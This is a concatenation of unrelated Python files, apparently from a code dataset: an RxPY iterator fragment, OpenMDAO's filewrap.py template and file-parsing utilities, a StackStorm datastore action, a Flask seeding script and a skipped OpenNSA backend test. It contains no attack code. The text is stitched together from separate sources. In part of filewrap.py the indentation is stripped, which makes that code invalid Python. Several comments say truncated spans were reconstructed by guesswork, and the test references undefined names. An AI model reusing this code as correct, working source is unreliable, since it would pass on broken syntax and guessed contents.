                return  # Stop iteration

            yield notification.value

    return Enumerator(gen())
@extensionmethod(BlockingObservable)
def __iter__(self):
    """Returns an iterator that can iterate over items emitted by this
    `BlockingObservable`.

    :param BlockingObservable self: Blocking observable instance.

    :returns: An iterator that can iterate over the items emitted by this
    `BlockingObservable`.
    :rtype: Iterable[Any]
    """
    # Delegates to the to_iterable extension method defined above.
    return self.to_iterable()
|
data/OpenMDAO/OpenMDAO-Framework/openmdao.util/src/openmdao/util/filewrap.py
|
"""
A collection of utilities for file wrapping.
Note: This is a work in progress.
"""
import re
from pyparsing import CaselessLiteral, Combine, OneOrMore, Optional, \
TokenConverter, Word, nums, oneOf, printables, \
ParserElement, alphanums
from numpy import append, array, zeros
def _getformat(val):
if int(val) == val:
return "%.1f"
else:
return "%.16g"
class _SubHelper(object):
"""Replaces file text at the correct word location in a line. This
class contains the Helper Function that is passed to re.sub, etc."""
def __init__(self):
self.newtext = ""
self.replace_location = 0
self.current_location = 0
self.counter = 0
self.start_location = 0
self.end_location = 0
def set(self, newtext, location):
"""Sets a new word location and value for replacement."""
self.newtext = newtext
self.replace_location = location
self.current_location = 0
def set_array(self, newtext, start_location, end_location):
"""For an array, sets a new starting location, ending location, and
value for replacement."""
self.newtext = newtext
self.start_location = start_location
self.end_location = end_location
self.current_location = 0
def replace(self, text):
"""This function should be passed to re.sub.
Outputs newtext if current_location = replace_location
Otherwise, outputs the input text."""
self.current_location += 1
if self.current_location == self.replace_location:
if isinstance(self.newtext, float):
return _getformat(self.newtext) % self.newtext
else:
return str(self.newtext)
else:
return text.group()
def replace_array(self, text):
"""This function should be passed to re.sub.
Outputs newtext if current_location = replace_location
Otherwise, outputs the input text."""
self.current_location += 1
end = len(self.newtext)
if self.current_location >= self.start_location and \
self.current_location <= self.end_location and \
self.counter < end:
if isinstance(self.newtext[self.counter], float):
val = self.newtext[self.counter]
newval = _getformat(val) % val
else:
newval = str(self.newtext[self.counter])
self.counter += 1
return newval
else:
return text.group()
class ToInteger(TokenConverter):
    """Converter for PyParsing that is used to turn a token into an int."""
    def postParse( self, instring, loc, tokenlist ):
        """Converter to make token into an integer."""
        return int(tokenlist[0])
class ToFloat(TokenConverter):
    """Converter for PyParsing that is used to turn a token into a float."""
    def postParse( self, instring, loc, tokenlist ):
        """Converter to make token into a float."""
        # 'D' exponents (Fortran double-precision notation) become 'E' first.
        return float(tokenlist[0].replace('D', 'E'))
class ToNan(TokenConverter):
    """Converter for PyParsing that is used to turn a token into Python nan."""
    def postParse( self, instring, loc, tokenlist ):
        """Converter to make token into Python nan."""
        return float('nan')
class ToInf(TokenConverter):
    """Converter for PyParsing that is used to turn a token into Python inf."""
    def postParse( self, instring, loc, tokenlist ):
        """Converter to make token into Python inf."""
        return float('inf')
class InputFileGenerator(object):
    """Utility to generate an input file from a template.

    Substitution of values is supported. Data is located with
    a simple API."""

    def __init__(self):
        self.template_filename = []
        self.output_filename = []
        # Default field delimiter; the regex matches non-delimiter "words".
        self.delimiter = " "
        self.reg = re.compile('[^ \n]+')
        self.data = []
        # Anchor state for relative row addressing.
        self.current_row = 0
        self.anchored = False

    def set_template_file(self, filename):
        """Set the name of the template file to be used. The template
        file is also read into memory when this method is called.

        filename: str
            Name of the template file to be used."""
        self.template_filename = filename
        templatefile = open(filename, 'r')
        self.data = templatefile.readlines()
        templatefile.close()

    def set_generated_file(self, filename):
        """Set the name of the file that will be generated.

        filename: str
            Name of the input file to be generated."""
        self.output_filename = filename

    def set_delimiters(self, delimiter):
        """Lets you change the delimiter that is used to identify field
        boundaries.

        delimiter: str
            A string containing characters to be used as delimiters."""
        self.delimiter = delimiter
        self.reg = re.compile('[^' + delimiter + '\n]+')

    def mark_anchor(self, anchor, occurrence=1):
        """Marks the location of a landmark, which lets you describe data by
        relative position. Note that a forward search begins at the old anchor
        location. If you want to restart the search for the anchor at the file
        beginning, then call ``reset_anchor()`` before ``mark_anchor``.

        anchor: str
            The text you want to search for.

        occurrence: integer
            Find nth instance of text; default is 1 (first). Use -1 to
            find last occurrence. Reverse searches always start at the end
            of the file no matter the state of any previous anchor."""
        if not isinstance(occurrence, int):
            raise ValueError("The value for occurrence must be an integer")
        instance = 0
        if occurrence > 0:
            count = 0
            max_lines = len(self.data)
            # NOTE: xrange is Python-2-only; this module predates Python 3.
            for index in xrange(self.current_row, max_lines):
                line = self.data[index]
                # If we are on the anchor line itself, only search the text
                # after the previous anchor occurrence.
                if count == 0 and self.anchored:
                    line = line.split(anchor)[-1]
                if line.find(anchor) > -1:
                    instance += 1
                    if instance == occurrence:
                        self.current_row += count
                        self.anchored = True
                        return
                count += 1
        elif occurrence < 0:
            max_lines = len(self.data)-1
            count = max_lines
            for index in xrange(max_lines, -1, -1):
                line = self.data[index]
                # Mirror of the forward case for reverse searches.
                if count == max_lines and self.anchored:
                    line = line.split(anchor)[0]
                if line.find(anchor) > -1:
                    instance += -1
                    if instance == occurrence:
                        self.current_row = count
                        self.anchored = True
                        return
                count -= 1
        else:
            raise ValueError("0 is not valid for an anchor occurrence.")
        raise RuntimeError("Could not find pattern %s in template file %s" % \
            (anchor, self.template_filename))

    def reset_anchor(self):
        """Resets anchor to the beginning of the file."""
        self.current_row = 0
        self.anchored = False

    def transfer_var(self, value, row, field):
        """Changes a single variable in the template relative to the
        current anchor.

        row - number of lines offset from anchor line (0 is anchor line).
        This can be negative.

        field - which word in line to replace, as denoted by delimiter(s)"""
        j = self.current_row + row
        line = self.data[j]
        sub = _SubHelper()
        sub.set(value, field)
        newline = re.sub(self.reg, sub.replace, line)
        self.data[j] = newline

    def transfer_array(self, value, row_start, field_start, field_end,
                       row_end=None, sep=", "):
        """Changes the values of an array in the template relative to the
        current anchor. This should generally be used for one-dimensional
        or free form arrays.

        value: float, integer, bool, str
            Array of values to insert.

        row_start: integer
            Starting row for inserting the array. This is relative
            to the anchor, and can be negative.

        field_start: integer
            Starting field in the given row_start as denoted by
            delimiter(s).

        field_end: integer
            The final field the array uses in row_end.
            We need this to figure out if the template is too small or large

        row_end: integer (optional)
            Use if the array wraps to cover additional lines.

        sep: integer (optional)
            Separator to use if we go beyond the template."""
        if row_end == None:
            row_end = row_start
        sub = _SubHelper()
        for row in range(row_start, row_end+1):
            j = self.current_row + row
            line = self.data[j]
            # Only the final row is bounded by field_end; intermediate rows
            # consume as many fields as they contain.
            if row == row_end:
                f_end = field_end
            else:
                f_end = 99999
            sub.set_array(value, field_start, f_end)
            field_start = 0
            newline = re.sub(self.reg, sub.replace_array, line)
            self.data[j] = newline
        if sub.counter < len(value):
            # Template had fewer fields than values: append the leftovers.
            for val in value[sub.counter:]:
                newline = newline.rstrip() + sep + str(val)
            self.data[j] = newline
            # NOTE(review): nesting reconstructed from a whitespace-mangled
            # source -- the newline re-append is taken to apply only when
            # extra values were appended (rstrip removed it); confirm
            # against the upstream file.
            self.data[j] += "\n"
        elif sub.counter > len(value):
            raise ValueError("Array is too small for the template.")

    def transfer_2Darray(self, value, row_start, row_end, field_start,
                         field_end, sep=", "):
        """Changes the values of a 2D array in the template relative to the
        current anchor. This method is specialized for 2D arrays, where each
        row of the array is on its own line.

        value: ndarray
            Array of values to insert.

        row_start: integer
            Starting row for inserting the array. This is relative
            to the anchor, and can be negative.

        row_end: integer
            Final row for the array, relative to the anchor.

        field_start: integer
            starting field in the given row_start as denoted by
            delimiter(s).

        field_end: integer
            The final field the array uses in row_end.
            We need this to figure out if the template is too small or large.

        sep: str (optional) (currently unsupported)
            Separator to append between values if we go beyond the template."""
        sub = _SubHelper()
        i = 0
        for row in range(row_start, row_end+1):
            j = self.current_row + row
            line = self.data[j]
            sub.set_array(value[i, :], field_start, field_end)
            newline = re.sub(self.reg, sub.replace_array, line)
            self.data[j] = newline
            # Reset the helper's cursors before processing the next row.
            sub.current_location = 0
            sub.counter = 0
            i += 1

    def clearline(self, row):
        """Replace the contents of a row with the newline character.

        row: integer
            Row number to clear, relative to current anchor."""
        self.data[self.current_row + row] = "\n"

    def generate(self):
        """Use the template file to generate the input file."""
        infile = open(self.output_filename, 'w')
        infile.writelines(self.data)
        infile.close()
class FileParser(object):
    """Utility to locate and read data from a file.

    Reading is anchor-based: ``mark_anchor`` locates a landmark string in
    the file, and the various ``transfer_*`` methods then address lines
    relative to that anchor.

    end_of_line_comment_char: str, optional
        If given, everything after this character on a line is discarded
        when the file is read.
    full_line_comment_char: str, optional
        If given, lines beginning with this character are skipped entirely
        when the file is read.
    """

    def __init__(self, end_of_line_comment_char=None, full_line_comment_char=None):
        # NOTE(review): ``filename`` starts life as a list but set_file()
        # stores a str; the odd initial value is kept for compatibility.
        self.filename = []
        self.data = []          # raw lines of the parsed file
        self.delimiter = " \t"  # default: whitespace-delimited fields
        self.end_of_line_comment_char = end_of_line_comment_char
        self.full_line_comment_char = full_line_comment_char
        self.current_row = 0    # row index of the current anchor
        self.anchored = False   # True once mark_anchor() has matched
        self.set_delimiters(self.delimiter)

    def set_file(self, filename):
        """Read ``filename`` into memory, honoring any comment characters.

        filename: str
            Name of the file to be parsed."""
        self.filename = filename
        # Fix: 'with' guarantees the handle is closed even if reading raises
        # (the original leaked the handle on error).
        with open(filename, 'r') as inputfile:
            if not self.end_of_line_comment_char and not self.full_line_comment_char:
                self.data = inputfile.readlines()
            else:
                self.data = []
                for line in inputfile:
                    # Drop whole-line comments entirely.
                    if line[0] == self.full_line_comment_char:
                        continue
                    # Strip any trailing end-of-line comment.
                    self.data.append(line.split(self.end_of_line_comment_char)[0])

    def set_delimiters(self, delimiter):
        """Lets you change the delimiter that is used to identify field
        boundaries.

        delimiter: str
            A string containing characters to be used as delimiters. The
            default value is ' \t', which means that spaces and tabs are not
            taken as data but instead mark the boundaries. Note that the
            parser is smart enough to recognize characters within quotes as
            non-delimiters. The special value 'columns' switches to
            fixed-column addressing."""
        self.delimiter = delimiter

        if delimiter != "columns":
            ParserElement.setDefaultWhitespaceChars(str(delimiter))

        # Delimiter choice changes tokenization, so rebuild the grammar.
        self._reset_tokens()

    def mark_anchor(self, anchor, occurrence=1):
        """Marks the location of a landmark, which lets you describe data by
        relative position. Note that a forward search begins at the old anchor
        location. If you want to restart the search for the anchor at the file
        beginning, then call ``reset_anchor()`` before ``mark_anchor``.

        anchor: str
            The text you want to search for.
        occurrence: integer
            Find nth instance of text; default is 1 (first). Use -1 to
            find last occurrence. Reverse searches always start at the end
            of the file no matter the state of any previous anchor.

        Raises ValueError for an invalid occurrence and RuntimeError when
        the anchor cannot be found."""
        if not isinstance(occurrence, int):
            raise ValueError("The value for occurrence must be an integer")

        instance = 0
        if occurrence > 0:
            count = 0
            max_lines = len(self.data)
            # Fix: range() instead of Python-2-only xrange() (works on both).
            for index in range(self.current_row, max_lines):
                line = self.data[index]

                # If currently anchored on this very line, only search the
                # text after the previous anchor match.
                if count == 0 and self.anchored:
                    line = line.split(anchor)[-1]

                if anchor in line:
                    instance += 1
                    if instance == occurrence:
                        self.current_row += count
                        self.anchored = True
                        return

                count += 1

        elif occurrence < 0:
            max_lines = len(self.data) - 1
            count = max_lines
            for index in range(max_lines, -1, -1):
                line = self.data[index]

                # On the current anchor line, only search the text before
                # the previous anchor match.
                if count == max_lines and self.anchored:
                    line = line.split(anchor)[0]

                if anchor in line:
                    instance += -1
                    if instance == occurrence:
                        self.current_row = count
                        self.anchored = True
                        return

                count -= 1
        else:
            raise ValueError("0 is not valid for an anchor occurrence.")

        raise RuntimeError("Could not find pattern %s in output file %s" %
                           (anchor, self.filename))

    def reset_anchor(self):
        """Resets anchor to the beginning of the file."""
        self.current_row = 0
        self.anchored = False

    def transfer_line(self, row):
        """Returns a whole line, relative to current anchor.

        row: integer
            Number of lines offset from anchor line (0 is anchor line).
            This can be negative."""
        return self.data[self.current_row + row].rstrip()

    def transfer_var(self, row, field, fieldend=None):
        """Grabs a single variable relative to the current anchor.

        --- If the delimiter is a set of chars (e.g., ", ") ---

        row: integer
            Number of lines offset from anchor line (0 is anchor line).
            This can be negative.
        field: integer
            Which word in line to retrieve.
        fieldend - IGNORED

        --- If the delimiter is "columns" ---

        row: integer
            Number of lines offset from anchor line (0 is anchor line).
            This can be negative.
        field: integer
            Character position to start.
        fieldend: integer (optional)
            Position of last character to return. If omitted, the end of
            the line is used."""
        j = self.current_row + row
        line = self.data[j]

        if self.delimiter == "columns":
            if not fieldend:
                line = line[(field - 1):]
            else:
                line = line[(field - 1):(fieldend)]

            # If the column span tokenizes into more than one field, return
            # the raw substring; otherwise return the single converted value.
            data = self._parse_line().parseString(line)
            if len(data) > 1:
                return line
            else:
                return data[0]
        else:
            data = self._parse_line().parseString(line)
            return data[field - 1]

    def transfer_keyvar(self, key, field, occurrence=1, rowoffset=0):
        """Searches for a key relative to the current anchor and then grabs
        a field from that line.

        field: integer
            Which field to transfer. Field 0 is the key.
        occurrence: integer
            Find nth instance of text; default is 1 (first value
            field). Use -1 to find last occurrence. Position 0 is the key
            field, so it should not be used as a value for occurrence.
        rowoffset: integer (optional)
            Optional row offset from the occurrence of key. This can
            also be negative.

        You can do the same thing with a call to ``mark_anchor`` and
        ``transfer_var``. This function just combines them for convenience."""
        if not isinstance(occurrence, int) or occurrence == 0:
            msg = "The value for occurrence must be a nonzero integer"
            raise ValueError(msg)

        instance = 0
        if occurrence > 0:
            row = 0
            for line in self.data[self.current_row:]:
                if line.find(key) > -1:
                    instance += 1
                    if instance == occurrence:
                        break
                row += 1
            else:
                # Fix: a missing key previously fell through to an obscure
                # IndexError; raise the same error mark_anchor uses.
                raise RuntimeError("Could not find pattern %s in output file %s" %
                                   (key, self.filename))
        elif occurrence < 0:
            # A negative ``row`` relies on Python's negative list indexing
            # (counts back from the end of the data).
            row = -1
            for line in reversed(self.data[self.current_row:]):
                if line.find(key) > -1:
                    instance += -1
                    if instance == occurrence:
                        break
                row -= 1
            else:
                raise RuntimeError("Could not find pattern %s in output file %s" %
                                   (key, self.filename))

        j = self.current_row + row + rowoffset
        line = self.data[j]

        # Replace the key with a single token so ``field`` indexes the
        # parsed fields consistently (field 0 is the key itself).
        fields = self._parse_line().parseString(line.replace(key, "KeyField"))
        return fields[field]

    def transfer_array(self, rowstart, fieldstart, rowend=None, fieldend=None):
        """Grabs an array of variables relative to the current anchor.

        rowstart: integer
            Row number to start, relative to the current anchor.
        fieldstart: integer
            Field number to start.
        rowend: integer (optional)
            Row number to end. If not set, then only one row is grabbed.
        fieldend: integer
            Field number to end (currently required).

        Setting the delimiter to 'columns' elicits some special behavior
        from this method. Normally, the extraction process wraps around
        at the end of a line and continues grabbing each field at the start of
        a newline. When the delimiter is set to columns, the parameters
        (rowstart, fieldstart, rowend, fieldend) demark a box, and all
        values in that box are retrieved. Note that standard whitespace
        is the secondary delimiter in this case.
        """
        j1 = self.current_row + rowstart
        if rowend is None:
            j2 = j1 + 1
        else:
            j2 = self.current_row + rowend + 1

        if not fieldend:
            raise ValueError("fieldend is missing, currently required")

        lines = self.data[j1:j2]
        data = zeros(shape=(0, 0))

        for i, line in enumerate(lines):
            if self.delimiter == "columns":
                line = line[(fieldstart - 1):fieldend]
                line = line.strip()

                parsed = self._parse_line().parseString(line)
                newdata = array(parsed[:])
                # If the parsed box came out string-typed ('|S' dtype), keep
                # the whole substring as a single element instead.
                if '|S' in str(newdata.dtype):
                    newdata = array(line)
                data = append(data, newdata)
            else:
                parsed = self._parse_line().parseString(line)
                if i == j2 - j1 - 1:
                    # Last line honors fieldend.
                    data = append(data, array(parsed[(fieldstart - 1):fieldend]))
                else:
                    data = append(data, array(parsed[(fieldstart - 1):]))
                # After the first line, wrap around to field 1.
                fieldstart = 1

        return data

    def transfer_2Darray(self, rowstart, fieldstart, rowend, fieldend=None):
        """Grabs a 2D array of variables relative to the current anchor. Each
        line of data is placed in a separate row.

        rowstart: integer
            Row number to start, relative to the current anchor.
        fieldstart: integer
            Field number to start.
        rowend: integer
            Row number to end relative to current anchor.
        fieldend: integer (optional)
            Field number to end. If not specified, grabs all fields up to the
            end of the line.

        If the delimiter is set to 'columns', then the values contained in
        fieldstart and fieldend should be the column number instead of the
        field number.
        """
        if fieldend and (fieldstart > fieldend):
            msg = "fieldend must be greater than fieldstart"
            raise ValueError(msg)

        if rowstart > rowend:
            msg = "rowend must be greater than rowstart"
            raise ValueError(msg)

        j1 = self.current_row + rowstart
        j2 = self.current_row + rowend + 1
        lines = list(self.data[j1:j2])

        if self.delimiter == "columns":
            if fieldend:
                line = lines[0][(fieldstart - 1):fieldend]
            else:
                line = lines[0][(fieldstart - 1):]

            parsed = self._parse_line().parseString(line)
            row = array(parsed[:])
            # Result is sized from the first line; every subsequent line
            # must parse to the same number of fields.
            data = zeros(shape=(abs(j2 - j1), len(row)))
            data[0, :] = row

            for i, line in enumerate(list(lines[1:])):
                if fieldend:
                    line = line[(fieldstart - 1):fieldend]
                else:
                    line = line[(fieldstart - 1):]

                parsed = self._parse_line().parseString(line)
                data[i + 1, :] = array(parsed[:])
        else:
            parsed = self._parse_line().parseString(lines[0])
            if fieldend:
                row = array(parsed[(fieldstart - 1):fieldend])
            else:
                row = array(parsed[(fieldstart - 1):])

            data = zeros(shape=(abs(j2 - j1), len(row)))
            data[0, :] = row

            for i, line in enumerate(list(lines[1:])):
                parsed = self._parse_line().parseString(line)
                if fieldend:
                    try:
                        data[i + 1, :] = array(parsed[(fieldstart - 1):fieldend])
                    except Exception:
                        # Fix: the original used a bare 'except' with a
                        # Python-2 'print' statement and silently left the
                        # row unset.  Show the partial result to aid
                        # debugging, then re-raise.
                        print(data)
                        raise
                else:
                    data[i + 1, :] = array(parsed[(fieldstart - 1):])

        return data

    def _parse_line(self):
        """Parse a single data line that may contain string or numerical data.
        Float and Int 'words' are converted to their appropriate type.
        Exponentiation is supported, as are NaN and Inf."""
        return self.line_parse_token

    def _reset_tokens(self):
        """Sets up the tokens for pyparsing."""
        # We can only use printables when the delimiter is pure whitespace;
        # otherwise separators like ',' or '=' could be swallowed as data.
        if self.delimiter.isspace():
            textchars = printables
        else:
            textchars = alphanums

        # NOTE(review): this list was truncated at the '#' character by the
        # extraction that produced this file; the tail ('#', '|', '<', '>')
        # is reconstructed and should be confirmed against the upstream
        # source.
        symbols = ['.', '/', '+', '*', '^', '(', ')', '[', ']', '=',
                   ':', ';', '?', '%', '&', '!', '#', '|', '<', '>',
                   '{', '}', '-', '_', '@', '$', '~']
        for symbol in symbols:
            if symbol not in self.delimiter:
                textchars = textchars + symbol

        digits = Word(nums)
        dot = "."
        sign = oneOf("+ -")
        ee = CaselessLiteral('E') | CaselessLiteral('D')

        num_int = ToInteger(Combine(Optional(sign) + digits))

        num_float = ToFloat(Combine(Optional(sign) +
                                    ((digits + dot + Optional(digits)) |
                                     (dot + digits)) +
                                    Optional(ee + Optional(sign) + digits)))

        # Special case for floats written without a decimal point, e.g. "3e5".
        mixed_exp = ToFloat(Combine(digits + ee + Optional(sign) + digits))

        # NOTE(review): the second literal below was truncated at '#' by the
        # extraction; the platform-specific NaN/Inf spellings (MSVC-style
        # "1.#QNAN" etc.) are reconstructed and should be confirmed upstream.
        nan = ToInf(oneOf("Inf -Inf")) | \
              ToNan(oneOf("NaN nan NaN%  NaNQ  NaNS qNaN sNaN " +
                          "1.#SNAN 1.#QNAN -1.#IND00 -1.#IND 1.#INF -1.#INF"))

        string_text = Word(textchars)

        self.line_parse_token = (OneOrMore((nan | num_float | mixed_exp |
                                            num_int | string_text)))
|
data/StackStorm/st2contrib/packs/st2/actions/kv_get_object.py
|
import json
from lib.action import St2BaseAction
# Public API of this action module: the single action class below.
__all__ = [
    'St2KVPGetObjectAction'
]
class St2KVPGetObjectAction(St2BaseAction):
    """Fetch a datastore key by name and return its JSON-decoded value."""

    def run(self, key):
        # Look the key up in the st2 datastore; a missing key is falsy.
        kvp = self.client.keys.get_by_name(key)
        if not kvp:
            raise Exception("Key does not exist")
        # Stored values are JSON strings; decode before returning.
        return json.loads(kvp.value)
|
data/JamesRitchie/django-rest-framework-sav/rest_framework_sav/__init__.py
|
"""Package adding Session Authentication view to Django REST Framework."""
# Names exported by ``from rest_framework_sav import *``.
__all__ = [
    'views'
]
# Package version string for the distribution.
__version__ = '0.1.0'
|
data/Pegase745/sqlalchemy-datatables/examples/flask_tut/flask_tut/scripts/initializedb.py
|
"""Initialize DB with fixtures."""
from time import sleep
from flask import Flask
from flask_tut.models import (
db,
User,
Address,
)
app = Flask(__name__)

with app.app_context():
    db.create_all()

    # Seed 30 user/address pairs.
    # NOTE(review): the two constructor calls below were truncated at the
    # '#' character during extraction; the 'Address#NN' / 'User#NN' label
    # format is reconstructed and should be confirmed against the upstream
    # sqlalchemy-datatables example.
    for i in range(30):
        address = Address(description='Address#{0:02d}'.format(i))
        db.session.add(address)
        user = User(name='User#{0:02d}'.format(i))
        user.address = address
        db.session.add(user)
        # Sleep so each record gets a distinct creation timestamp.
        sleep(1)
    db.session.commit()
|
data/NORDUnet/opennsa/test/test_ncsvpn.py
|
import os, datetime, json
from twisted.trial import unittest
from twisted.internet import defer, task
from opennsa import config, nsa, database
from opennsa.topology import nml
from opennsa.backends import ncsvpn
from . import common
class NCSVPNBackendTest(unittest.TestCase):
    # Integration test for the NCS VPN backend against a real NCS lab.
    # NOTE(review): this test references several names never defined in this
    # file (``self.sr``, ``self.reserve``, ``d_up``, ``d_down``); it is
    # permanently skipped (see the ``.skip`` attribute at the bottom) and
    # would fail with AttributeError/NameError if enabled as-is.
    def setUp(self):
        # Virtual clock so scheduler timing can be advanced deterministically.
        self.clock = task.Clock()
        # Lab credentials and endpoints are read from a JSON file in $HOME.
        tcf = os.path.expanduser('~/.opennsa-test.json')
        tc = json.load( open(tcf) )
        ncs_config = {
            config.NCS_SERVICES_URL : tc['ncs-url'],
            config.NCS_USER : tc['ncs-user'],
            config.NCS_PASSWORD : tc['ncs-password']
        }
        self.requester = common.DUDRequester()
        # NOTE(review): ``self.sr`` is not defined anywhere in this file —
        # presumably a service registry; confirm against the backend API.
        self.backend = ncsvpn.NCSVPNBackend('Test', self.sr, self.requester, ncs_config)
        self.backend.scheduler.clock = self.clock
        self.backend.startService()
        database.setupDatabase( tc['database'], tc['database-user'], tc['database-password'])
        self.requester_nsa = nsa.NetworkServiceAgent('test-requester', 'http://example.org/nsa-test-requester')
        self.provider_nsa = nsa.NetworkServiceAgent('test-provider', 'http://example.org/nsa-test-provider')
        # Source/destination endpoints with VLAN label ranges.
        source_stp = nsa.STP('ncs', 'hel:ge-1/0/1', labels=[ nsa.Label(nml.ETHERNET_VLAN, '100-102') ] )
        dest_stp = nsa.STP('ncs', 'sto:ge-1/0/1', labels=[ nsa.Label(nml.ETHERNET_VLAN, '101-104') ] )
        # Short reservation window: starts in 2 s, ends in 30 s.
        start_time = datetime.datetime.utcnow() + datetime.timedelta(seconds=2)
        end_time = datetime.datetime.utcnow() + datetime.timedelta(seconds=30)
        bandwidth = 200
        self.service_params = nsa.ServiceParameters(start_time, end_time, source_stp, dest_stp, bandwidth)
    @defer.inlineCallbacks
    def tearDown(self):
        # Clean out connection rows created by the test, then stop the backend.
        from opennsa.backends.common import simplebackend
        yield simplebackend.Simplebackendconnection.deleteAll()
        yield self.backend.stopService()
    @defer.inlineCallbacks
    def testActivation(self):
        # Reserve -> commit -> provision, then advance the virtual clock past
        # the start time so activation fires.
        # NOTE(review): ``self.reserve`` and the deferreds ``d_up``/``d_down``
        # are not defined in this file; the test cannot run as written.
        _,_,cid,sp = yield self.reserve(self.requester_nsa, self.provider_nsa, None, None, None, None, self.service_params)
        yield self.backend.reserveCommit(self.requester_nsa, self.provider_nsa, None, cid)
        yield self.backend.provision(self.requester_nsa, self.provider_nsa, None, cid)
        self.clock.advance(3)
        connection_id, active, version_consistent, version, timestamp = yield d_up
        self.failUnlessEqual(cid, connection_id)
        self.failUnlessEqual(active, True)
        self.failUnlessEqual(version_consistent, True)
        yield self.backend.terminate(self.requester_nsa, self.provider_nsa, None, cid)
        connection_id, active, version_consistent, version, timestamp = yield d_down
        self.failUnlessEqual(cid, connection_id)
        self.failUnlessEqual(active, False)
        self.failUnlessEqual(version_consistent, True)
    # Permanently skip: requires a live NCS lab environment.
    testActivation.skip = 'NCS VPN Test Requires NCS lab setup'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.